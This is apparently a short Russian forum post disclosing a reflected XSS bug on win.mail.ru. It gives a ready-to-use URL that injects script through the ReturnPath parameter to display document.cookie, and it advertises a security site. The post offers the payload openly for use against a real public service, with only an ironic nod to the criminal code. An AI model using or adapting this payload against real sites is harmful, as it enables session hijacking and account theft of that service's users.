Этот баг класса XSS, на mail.ru, который я нашел более полугода года назад и благополучно о забыл нем. Пользуйтесь на здаровье, но не забывая об УК РФ:
http:// win.mail.ru/cgi-bin/sendmsgok?ReturnPath=] [script[alert(document.cookie); alert('Visit www.security-teams.net ;)');[/script]
